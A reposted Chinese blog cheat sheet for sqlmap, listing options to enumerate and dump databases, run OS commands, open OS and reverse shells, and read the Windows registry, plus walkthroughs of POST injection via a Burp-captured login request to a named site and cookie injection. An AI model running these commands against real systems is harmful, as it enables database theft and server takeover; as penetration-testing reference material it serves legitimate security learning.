码迷,mamicode.com
首页 > 数据库 > 详细

SQLMAP用法

时间:2018-04-23 11:13:13      阅读:202      评论:0      收藏:0      [点我收藏+]

标签:SQ   roles   数据库名   col   运行   blog   包含   提示   指定   

基本用法:

  --dbs  查询数据库

  --current--db  获取当前数据库名称

  --current--user 获得用户

  --tables -D “数据库”   // 列举数据库的表名

  --columns -T “表名” -D “数据库”   // 获取表的列名

  --dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列

  –privileges / 查看权限

  privileges -U root / 查看用户权限

  –roles / 枚举数据库用户角色

  --proxy "http://127.0.0.1:8080" 代理注入

  --sql-query=xx 要执行的SQL语句

  --sql-shell 提示交互式 SQL 的 shell

  --os-cmd=xxx执行操作系统命令
  --os-shell 交互式的操作系统的 shell
  --os-pwn 反弹shell
  --reg-read 读取win系统注册表
  --dbs-o "sqlmap.log" 保存进度
  --dbs-o "sqlmap.log" -resume 恢复已保存进度

POST注入   

  1. 浏览器打开目标地址http:// blog.websafe3.org /Login.asp
  2. 配置burp代理(127.0.0.1:8080)以拦截请求
  3. 点击login表单的submit按钮
  4. 这时候Burp会拦截到了我们的登录POST请求
  5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下

  6. 运行sqlmap并使用如下命令:

  ./sqlmap.py -r search-test.txt -p tfUPass  

  这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt,
  而-p 大家应该比较熟悉,指定注入用的参数。

COOKIES注入

  sqlmap.py -u "http://127.0.0.1/base.php" --cookies "id=1" --dbs --level 2

  默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用--level 参数且数值>=2的时候也会检查 cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 --level 2 即可

 

SQLMAP用法

标签:SQ   roles   数据库名   col   运行   blog   包含   提示   指定   

原文地址:https://www.cnblogs.com/pangya/p/8915692.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!